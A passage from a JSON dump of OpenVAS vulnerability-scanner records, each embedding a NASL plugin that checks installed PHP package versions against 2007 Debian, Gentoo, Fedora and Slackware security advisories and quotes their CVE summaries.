security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ldap\", rpm:\"i386/php-ldap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:41", "bulletinFamily": "scanner", "description": "The remote host is missing an update to 
php4\nannounced via advisory DSA 1282-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58334", "id": "OPENVAS:58334", "title": "Debian Security Advisory DSA 1282-1 (php4)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1282_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1282-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. 
The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2007-1286\nStefan Esser discovered an overflow in the object reference handling\ncode of the unserialize() function, which allows the execution of\narbitrary code if malformed input is passed from an application.\n\nCVE-2007-1380\nStefan Esser discovered that the session handler performs\ninsufficient validation of variable name length values, which allows\ninformation disclosure through a heap information leak.\n\nCVE-2007-1521\nStefan Esser discovered a double free vulnerability in the\nsession_regenerate_id() function, which allows the execution of\narbitrary code.\n\nCVE-2007-1711\nStefan Esser discovered a double free vulnerability in the session\nmanagement code, which allows the execution of arbitrary code.\n\nCVE-2007-1718\nStefan Esser discovered that the mail() function performs\ninsufficient validation of folded mail headers, which allows mail\nheader injection.\n\nCVE-2007-1777\nStefan Esser discovered that the extension to handle ZIP archives\nperforms insufficient length checks, which allows the execution of\narbitrary code.\n\nFor the oldstable distribution (sarge) these problems have been fixed in\nversion 4.3.10-20.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 4.4.4-8+etch2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.4.6-1. php4 will be removed from sid; thus you are strongly\nadvised to migrate to php5 if you prefer to follow the unstable\ndistribution.\n\nWe recommend that you upgrade your PHP packages. 
Packages for the arm,\";\ntag_summary = \"The remote host is missing an update to php4\nannounced via advisory DSA 1282-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201282-1\";\n\nif(description)\n{\n script_id(58334);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-1286\", \"CVE-2007-1380\", \"CVE-2007-1521\", \"CVE-2007-1711\", \"CVE-2007-1718\", \"CVE-2007-1777\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_name(\"Debian Security Advisory DSA 1282-1 (php4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php4-pear\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-php4\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php4\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"php4-cgi\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cli\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-common\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-curl\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-dev\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-domxml\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-gd\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-imap\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-ldap\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcal\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mhash\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-odbc\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-recode\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-snmp\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-sybase\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-xslt\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-pear\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4\", 
ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-php4\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php4\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cgi\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cli\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-common\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-curl\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-dev\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-domxml\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-gd\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-imap\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-ldap\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcal\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcrypt\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mhash\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-odbc\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-pgsql\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n 
report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-pspell\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-recode\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-snmp\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-sybase\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-xslt\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-interbase\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:10", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200705-19.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58297", "id": "OPENVAS:58297", "title": "Gentoo Security Advisory GLSA 200705-19 (php)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP contains several vulnerabilities including buffer and integer overflows\nwhich could under certain conditions lead to the remote execution of\narbitrary code.\";\ntag_solution = \"All PHP 5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.2.2'\n\nAll PHP 4 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-4.4.7'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200705-19\nhttp://bugs.gentoo.org/show_bug.cgi?id=169372\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200705-19.\";\n\n \n\nif(description)\n{\n script_id(58297);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1484\", \"CVE-2007-1521\", \"CVE-2007-1583\", \"CVE-2007-1700\", \"CVE-2007-1701\", 
\"CVE-2007-1711\", \"CVE-2007-1717\", \"CVE-2007-1718\", \"CVE-2007-1864\", \"CVE-2007-1900\", \"CVE-2007-2509\", \"CVE-2007-2510\", \"CVE-2007-2511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 200705-19 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-lang/php\", unaffected: make_list(\"rge 4.4.7\", \"ge 5.2.2\"), vulnerable: make_list(\"lt 5.2.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:39", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861185", "id": "OPENVAS:861185", "title": "Fedora Update for php FEDORA-2007-526", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2007-526\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright 
(c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"php on Fedora Core 5\";\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated webpages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts. 
The\n mod_php module enables the Apache Web server to understand and process\n the embedded PHP language in Web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-May/msg00045.html\");\n script_id(861185);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-526\");\n script_cve_id(\"CVE-2007-1864\", \"CVE-2007-2509\", \"CVE-2007-2510\", \"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2006-5465\", \"CVE-2006-4812\");\n script_name( \"Fedora Update for php FEDORA-2007-526\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", 
rpm:\"php~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pgsql\", rpm:\"x86_64/php-pgsql~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-bcmath\", rpm:\"x86_64/php-bcmath~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ncurses\", rpm:\"x86_64/php-ncurses~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/php-debuginfo\", rpm:\"x86_64/debug/php-debuginfo~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php\", rpm:\"x86_64/php~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ldap\", rpm:\"x86_64/php-ldap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-soap\", rpm:\"x86_64/php-soap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-dba\", rpm:\"x86_64/php-dba~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-gd\", rpm:\"x86_64/php-gd~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-devel\", rpm:\"x86_64/php-devel~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-imap\", rpm:\"x86_64/php-imap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xml\", rpm:\"x86_64/php-xml~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mysql\", rpm:\"x86_64/php-mysql~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xmlrpc\", rpm:\"x86_64/php-xmlrpc~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pdo\", rpm:\"x86_64/php-pdo~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mbstring\", rpm:\"x86_64/php-mbstring~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-snmp\", rpm:\"x86_64/php-snmp~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-odbc\", rpm:\"x86_64/php-odbc~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xml\", rpm:\"i386/php-xml~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pdo\", rpm:\"i386/php-pdo~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-imap\", rpm:\"i386/php-imap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xmlrpc\", rpm:\"i386/php-xmlrpc~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-bcmath\", rpm:\"i386/php-bcmath~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/php-debuginfo\", rpm:\"i386/debug/php-debuginfo~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-dba\", rpm:\"i386/php-dba~5.1.6~1.6\", rls:\"FC5\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php\", rpm:\"i386/php~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ncurses\", rpm:\"i386/php-ncurses~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-devel\", rpm:\"i386/php-devel~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mbstring\", rpm:\"i386/php-mbstring~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-odbc\", rpm:\"i386/php-odbc~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-gd\", rpm:\"i386/php-gd~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pgsql\", rpm:\"i386/php-pgsql~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mysql\", rpm:\"i386/php-mysql~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-snmp\", rpm:\"i386/php-snmp~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ldap\", rpm:\"i386/php-ldap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-soap\", rpm:\"i386/php-soap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:14", "bulletinFamily": "scanner", "description": "The remote 
host is missing an update as announced\nvia advisory SSA:2007-127-01.", "modified": "2018-04-06T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231058262", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231058262", "title": "Slackware Advisory SSA:2007-127-01 php", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2007_127_01.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New php packages are available for Slackware 10.2, 11.0, and -current\nto improve the stability and security of PHP. Quite a few bugs were\nfixed -- please see http://www.php.net for a detailed list.\nAll sites that use PHP are encouraged to upgrade. 
Please note that\nwe haven't tested all PHP applications for backwards compatibility\nwith this new upgrade, so you should have the old package on hand\njust in case.\n\nBoth PHP 4.4.7 and PHP 5.2.2 updates have been provided.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2007-127-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2007-127-01\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.58262\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_cve_id(\"CVE-2007-1001\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 9352 $\");\n name = \"Slackware Advisory SSA:2007-127-01 php \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
